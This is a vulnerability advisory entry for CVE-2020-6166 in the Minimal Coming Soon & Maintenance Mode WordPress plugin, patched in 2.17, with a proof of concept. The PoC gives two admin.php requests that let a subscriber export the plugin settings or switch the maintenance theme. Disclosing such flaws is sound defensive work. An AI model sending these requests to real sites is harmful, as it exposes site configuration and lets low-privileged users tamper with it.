Minimal Coming Soon & Maintenance Mode < 2.17 – Insecure permissions: Export Settings/Theme Change | CVE 2020-6166 | Plugin Vulnerabilities

Description

There was a flaw that would allow any user logged in as a subscriber or above to export the plugin settings as a .txt file or modify the theme of the maintenance page on a vulnerable site.

Proof of Concept

Login with subscriber or above permissions and send the following request to export the plugin settings:

/wp-admin/admin.php?action=csmm_export_settings&redirect=/wp-admin/

Alternatively, send the following request to change the theme:

/wp-admin/admin.php?action=csmm_activate_theme&theme=minimal&redirect=/wp-admin/

Affects Plugins

minimal-coming-soon-maintenance-mode

Fixed in 2.17

References

CVE

URL

https://www.wordfence.com/blog/2020/01/multiple-vulnerabilities-patched-in-minimal-coming-soon-maintenance-mode-coming-soon-page-plugin/

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

Verified

No

WPVDB ID

b857c163-aef3-47a8-bb1e-b1e14effca4f

Timeline

Publicly Published

2020-01-08 (about 6 years ago)

Added

2020-01-08 (about 6 years ago)

Last Updated

2020-09-22 (about 5 years ago)

Other

Published

Title

Published

2022-05-17

Title

iQ Block Country < 1.2.20 - Protection Bypass due to IP Spoofing

Published

2023-05-24

Title

Upload Resume <= 1.2.0 - Captcha Bypass

Published

2020-01-27

Title

WPS Hide Login < 1.5.5 - Secret Login Page Disclosure

Published

2014-09-17

Title

WordPress Mobile Pack 1.0.8223 - 2.0.1 Password Protected Post Disclosure

Published

2019-03-21

Title

Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update